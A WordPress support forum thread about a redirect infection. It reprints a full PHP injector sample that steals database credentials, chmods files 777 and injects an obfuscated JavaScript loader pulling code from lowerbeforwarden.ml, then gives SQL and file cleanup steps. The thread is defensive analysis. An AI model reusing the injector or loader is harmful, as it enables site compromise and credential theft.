wordfence not really safe my site, now redirected
-
My site keeps getting redirected by attackers even though I run the Wordfence Pro version …
Every three weeks the same thing happens again, each time with a different redirect target.
Right now it redirects to: https://directednotconverted.ml
-
I found the script that caused all this. It was introduced via the WP File Manager plugin:
The injector code, reproduced below for analysis (do not execute it), is:
<?php
/* MALWARE SAMPLE, reproduced for analysis only -- do not execute. Entry point: print a marker, turn on error display, walk the tree rooted at DOCUMENT_ROOT plus eight "../" (on most hosts that resolves at or near the filesystem root, so every site on the box is in scope) looking for names containing ".js", then exit. NOTE(review): in this copy every make_it_*() write and every recursive call inside the search_* walkers is commented out, and the UPDATE branch in show_sitenames() is dead code (see there), so this snapshot scans but modifies nothing; the copies that actually did the damage presumably had those lines enabled. */
echo "ssqqss>>>"; error_reporting(E_ALL); ini_set('display_errors', 1); search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js"); die();
/* Returns the first capture group of regex $pat (wrapped in /.../is) matched against $text, or "" when nothing matches. Used below to scrape the DB_* constants out of config files. */
function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; }
/* Recursive walk: every non-directory entry whose name contains $file_to_search is handed to show_sitenames(). If scandir() fails, three characters (one "../") are trimmed off $dir and the walk retries from there. Nothing in this file calls it; $search_array is never used. */
function search_file_ms($dir, $file_to_search) { $search_array = array(); $files = scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_ms($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { @search_file_ms($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false) { show_sitenames($path); } } else if ($value != "." && $value != "..") { @search_file_ms($path, $file_to_search); } } }
/* Credential theft + database injection. If $file mentions DB_NAME, regex-scrape DB_HOST/DB_USER/DB_PASSWORD from it ($db is scraped but never used), connect with mysqli and no default schema, and enumerate every table in every schema the account can see whose name contains "post" -- i.e. not just this site's database. For each table it reads one post_content row and, in the intended variant, CONCATs the ns1 script tag onto every row that does not already mention scripts.lowerbeforwarden.ml. The tag it appends references temp.lowerbeforwarden.ml, not scripts.lowerbeforwarden.ml, so that WHERE never excludes an already-injected row and each run appends another copy. */
function show_sitenames($file) { $content = @file_get_contents($file); if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content); // Create connection
$conn = new mysqli($host, $user, $pass); // Check connection
if ($conn->connect_error) { } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while ($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . 
" LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) { while ($row2 = $result2->fetch_assoc()) { $val = $row2['post_content']; /* strpos() never returns boolean true, so this branch -- and the UPDATE nested inside it -- is unreachable in this copy; the working variant presumably tested === false. */ if (strpos($val, "scripts.lowerbeforwarden.ml") === true) { var_dump($val); exit; if (strpos($val, "scripts.lowerbeforwarden.ml") === false) { $q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'"; $conn->query($q3); echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"]; } else { } } } else { } } } else { } $conn->close(); } } }
/* Walker for names containing $file_to_search plus ".ph" or ".htm" (note the misplaced parenthesis: the ".htm" test is only truthiness-checked). Meant to call make_it() on each hit; in this copy the make_it() call, the recursion and the retry calls are all commented out, so it only lists the starting directory. */
function search_file($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //@search_file($dir, $file_to_search);
return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //@search_file($dir, $file_to_search);
return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { //make_it($path);
} } else if ($value != "." && $value != "..") { //search_file($path, $file_to_search);
} } }
/* Same walker shape as search_file(), meant to call make_it_index() on each .ph/.htm hit; every write, recursion and retry is commented out here. */
function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //search_file_index($dir, $file_to_search);
return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //search_file_index($dir, $file_to_search);
return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { //make_it_index($path);
} } else if ($value != "." 
&& $value != "..") { //search_file_index($path, $file_to_search);
} } }
/* The walker the entry line actually invokes (with ".js"). Its make_it_js() write, recursion and retry calls are commented out, so in this copy it performs one scandir() of the starting directory and nothing else. */
function search_file_js($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //@search_file_js($dir, $file_to_search);
return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //@search_file_js($dir, $file_to_search);
return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) { //make_it_js($path);
} } else if ($value != "." && $value != "..") { //search_file_js($path, $file_to_search);
} } }
/* Payload writer for .js files: prepends $l2, a loader that assembles "script", "text/javascript" and "https://temp.lowerbeforwarden.ml/temp.js" via String.fromCharCode and attaches the element after the first <script>, after <head>, and inside <head>. It runs system('chmod 777 <path>') with the path unescaped before writing -- a useful detection hint in shell/audit logs. The already-infected test looks for the char-code form of "scripts.lowerbeforwarden.ml", which $l2 does not contain (it encodes "temp."), so every run prepends another copy; that is why infected files show the loader repeated back to back. */
function make_it_js($f) { $g = file_get_contents($f); if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) { } else { $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"; $g = file_get_contents($f); $g = $l2 . $g; @system('chmod 777 ' . $f); @file_put_contents($f, $g); echo "js:" . $f . 
"\r\n"; } }
/* Same idea for index-style files, prepending a plain nb5 <script> tag. Bug: $g is tested before file_get_contents() assigns it, so the already-infected check never fires and the tag is prepended on every run. Also chmods the file 777 via system() first. */
function make_it_index($f) { if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) { } else { $l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>"; $g = file_get_contents($f); $g = $l2 . $g; @system('chmod 777 ' . $f); @file_put_contents($f, $g); echo "in:" . $f . "\r\n"; } }
/* For .php/.htm files: wraps the same char-code loader in <script type=text/javascript> and writes it right after "<head>", then separately right before "</head>". Both str_replace() calls start from the original $g, so for a file containing both tags the second write overwrites the first and only the "</head>" injection survives. Same chmod 777 via system() before each write. */
function make_it($f) { $g = file_get_contents($f); if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) { } else { $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; if (strpos($g, '<head>') !== false) { $b = str_replace("<head>", "<head>" . $l2, $g); @system('chmod 777 ' . $f); @file_put_contents($f, $b); echo "hh:" . $f . "\r\n"; } if (strpos($g, '</head>') !== false) { $b = str_replace("</head>", $l2 . "</head>", $g); @system('chmod 777 ' . $f); @file_put_contents($f, $b); echo "hh:" . $f . "\r\n"; } } }
I tried to reverse-engineer the hack.
The script prepends an obfuscated loader to .js files, prepends a plain <script> tag to index files, and inserts the loader into any .php/.htm file that contains <head>. It also scrapes DB_HOST/DB_USER/DB_PASSWORD from any file defining DB_NAME, connects with those credentials, and appends a script tag to post_content in every table whose name contains "post" — across every database that account can see, not just this site's.
The first step is to remove every occurrence of the injected scripts. I used VS Code to find and delete them by searching the whole web root for the two strings below. Two caveats: the injector walks upward from DOCUMENT_ROOT, so search every site on the host, not just the one that redirects; and removing the injected strings alone does not remove whatever keeps re-running the injector — if that is not found as well, the infection comes back (compare the three-week recurrence described at the top of this thread).
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
and
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
After that, back up the database and run this statement against it. Replace wp_ with your table prefix, and note that REPLACE() is a literal match: the tag in your rows must match byte for byte, including attribute order.
/* Strips the database-injected tag (src-first attribute order, n=ns1, the same string the injector CONCATs onto post_content). REPLACE() is a literal match, so check the exact tag in your rows first; back up the database and swap wp_ for your own prefix. */ UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", '') WHERE post_content LIKE '%lowerbeforwarden%';
If you use W3 Total Cache or any other caching plugin, purge it and remove the cache directory as well — otherwise cached copies of your pages keep serving the injected script after the source files are clean.
It had infected 12+ sites on my server, including non-WordPress PHP projects — consistent with the injector walking upward from DOCUMENT_ROOT instead of staying inside a single site.
Hope it helps.
I have the same problem, is there anybody that can help us?
Hello allmassim, I can do this using mysql codes.
I have the same problem with the following code:
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
Can anybody help us? Wordfence was enabled….
Nasty new malware that gets in via WP File Manager. There is a walkthrough video on how to clean it up at the following link:
https://dorset.tech/nasty-new-malware-doing-the-rounds-lowerbeforwarden-ml/
Hi @jazzmavericks
That's right — we blamed Wordfence wrongly. The link you mentioned was a great help. I have many websites on my VPS and only one of them has this issue: the one running WP File Manager. That plugin had a security update 5 days ago, and they seem to have made a mess of it. :/

Great analysis, "safalshrestha", which may help all of us solve the problem. I'm just a user, not a professional; all I have is 8-day-old backups and access to my hosting panel. I can't go through 500 files looking for the malicious code, but I can ask my provider to restore the backup from 1.9. — that won't be enough on its own though, will it?
What do I have to do to stop them coming back in through the back door? What are your instructions?
– first: delete WP File Manager or update it – and then?
Hi @khubaib927,
my template is missing … regards, Helmut
@khubaib927 can you please give me a hand with the file cleanup and the MySQL statements?
To remove the script from the database, one of these three statements should match your variant. Check which exact tag is in your post_content first: REPLACE() needs a literal match, and the nb5 tag quoted earlier in this thread has type= before src=, the opposite order from the second statement below, so it would not be matched as written. Replace the wp_ prefix with yours and back up the database before running anything.
/* Three variants of the injected tag; each REPLACE() is a literal byte match (attribute order, quotes and the n= parameter must be identical to what is in your rows). There is no WHERE clause, so every row is rewritten; the tag is replaced by a single space rather than removed outright. Back up first and swap wp_ for your prefix. */ UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5' type='text/javascript'></script>", " ")); /* ns1 variant: this is the exact string the injector CONCATs into post_content. */ UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", " ")); /* scripts.* host variant. */ UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));
Dear
My website also appears to be hacked. Weirdly enough, I have several subsites hosted on the same domain name (even clones of the main website) that are (still) unaffected.
The above solutions did not work for me. I’d love to know a solution that fixes my problem – and maybe a solution to prevent this from happening on my other subsites.
I hope we find the solution for this one soon, because it’s spooking me out a lot! I can’t quite grasp how this happened.
Thanks in advance
Best regards

All 3 of my websites on the same hosting account were hacked with the same redirect. The attackers also changed folder and file permissions, especially on .php and .js files (the injector runs chmod 777 on every file it writes).
Is there a fast way to fix this? I replaced the redirect code in MySQL wherever the link shows up, but it is still not fixed.
@khubaib927 please guide us if you can,
I followed julioanampa's steps to the letter and found these script tags in all my posts.
I also found a long block like the following prepended to my JS files, repeated three times back to back. That repetition is expected: the injector's already-infected check looks for the char-code form of "scripts.lowerbeforwarden.ml", which the loader it writes does not contain, so every run prepends another copy.
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = 
String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
My site is back to normal now.
same problem
Step 1: check your database options (the wording is ambiguous — most likely the wp_options table, where siteurl/home may have been changed to the malicious domain)
and change it back to the original value.
Step 2: open your theme's header.php and look for <!DOCTYPE html>; delete any code that appears before it, and check the rest of the file for malicious code and remove it carefully.
Step 3: check the mu-plugins folder (under wp-content) with the file manager. Must-use plugins load automatically without activation, so it is a common place to drop a persistence file — but legitimate must-use plugins live there too, so remove only the files you cannot account for rather than the whole folder blindly.
Step 4: run a Wordfence scan and remove or restore every file it flags.
Step 5: scan every domain in your cPanel (or other control panel) account — the injector walks upward from the web root, so other sites on the same account are likely affected too.